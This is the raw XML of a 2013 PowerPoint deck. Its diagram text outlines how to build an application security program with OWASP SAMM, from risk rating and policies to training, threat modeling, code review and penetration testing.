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3" r:id="rId2"/>
    <p:sldId id="277" r:id="rId3"/>
    <p:sldId id="272" r:id="rId4"/>
    <p:sldId id="274" r:id="rId5"/>
    <p:sldId id="289" r:id="rId6"/>
    <p:sldId id="294" r:id="rId7"/>
    <p:sldId id="256" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10"/>
    <p:sldId id="260" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="259" r:id="rId15"/>
    <p:sldId id="288" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="280" r:id="rId2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6AC"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="D0D9CF"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="3333FF"/>
    <a:srgbClr val="F9FBFD"/>
    <a:srgbClr val="4F81BD"/>
    <a:srgbClr val="4F5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9" autoAdjust="0"/>
    <p:restoredTop sz="95335" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="-990" y="23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Verification" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1"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Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3"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smtClean="0"/>
            <a:t>Get Started</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>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Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> and drive adoption. </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smtClean="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dirty="0" smtClean="0"/>
            <a:t>Identify and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>prioritize your application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> from an inherent risk perspective.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9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" type="parTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6249606A-E44B-456D-8550-331FDC0465D3}" type="sibTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>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smtClean="0"/>
            <a:t>Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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smtClean="0"/>
            <a:t>Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>common set of reusable security controls</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> 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smtClean="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> that is required and targeted to different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smtClean="0"/>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smtClean="0"/>
            <a:t>Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>security implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> activities into existing development and operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>Threat Modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Secure Design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Secure Coding &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>Code Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Penetration Testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="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smtClean="0"/>
            <a:t>Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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dirty="0" smtClean="0"/>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dirty="0" smtClean="0"/>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dirty="0" smtClean="0"/>
            <a:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.</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smtClean="0"/>
            <a:t>Conduct </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>define </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>key </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>improvement areas and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>an execution </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>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smtClean="0"/>
            <a:t>Gain </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>applicatio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId16"/>
            </a:rPr>
            <a:t>n security awareness </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId16"/>
            </a:rPr>
            <a:t>campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> for the entire IT </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>organization.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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168F1251-0689-442A-B8FC-0A781112776D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Create an application risk profiling model to measure and prioritize the applications in your portfolio. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" type="parTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}" type="sibTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" type="parTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}" type="sibTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">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2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{23A55926-6632-4C49-BE69-326A87E18CBC}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="1" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{4D4901AE-986B-4432-9DC1-4E0F95A75C0C}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{85EDB1E7-A378-4F0C-B0F9-C3AC2705555F}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{86012D62-A2D0-4619-82DE-82E2DAD81915}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}"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3F49345C-EBC1-44D8-BC11-279CA7A6862B}" type="presOf" srcId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{43FBE940-8BFA-4EF5-A55D-083FACE306D9}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{168F1251-0689-442A-B8FC-0A781112776D}" srcOrd="1" destOrd="0" parTransId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" sibTransId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}"/>
    <dgm:cxn modelId="{D95EFEA5-B61A-4A2C-8A7A-18669C2814B8}" type="presOf" srcId="{168F1251-0689-442A-B8FC-0A781112776D}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9B1E24C1-9646-4B11-BED2-E864AE96290B}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{572A4DD0-8BB0-43D8-A35E-9D4C730E38B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7CE23833-C39B-44CF-88AA-5E5F3CB77A73}" type="presOf" srcId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3"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F5234BFB-0653-49D4-A393-2589918EFE10}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}"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FC62C5B-88D3-46E0-A53E-57D4877596DC}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4FF662A7-AB28-429F-864C-7ABE5405F113}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}"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460129C2-D5FA-4B36-A2D9-CA50D3D26274}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" srcOrd="2" destOrd="0" parTransId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" sibTransId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}"/>
    <dgm:cxn modelId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="2" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{F5AF1F6E-9C66-4796-998A-0AAADCF54EA0}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F34BF083-B836-4506-BB3B-F0A01920D227}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F474165F-1E84-42E2-A98E-15E6795C7260}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}"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754476D4-7D8C-427D-8A6B-D0B60927777C}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}"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53179D04-4118-4358-AD17-8CE5C48A534D}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6010088D-1046-466A-BB02-8A55CE262380}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" srcOrd="3" destOrd="0" parTransId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" sibTransId="{6249606A-E44B-456D-8550-331FDC0465D3}"/>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75393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8/31/2013</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76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</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we squeeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a mention of ‘parameter tampering’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
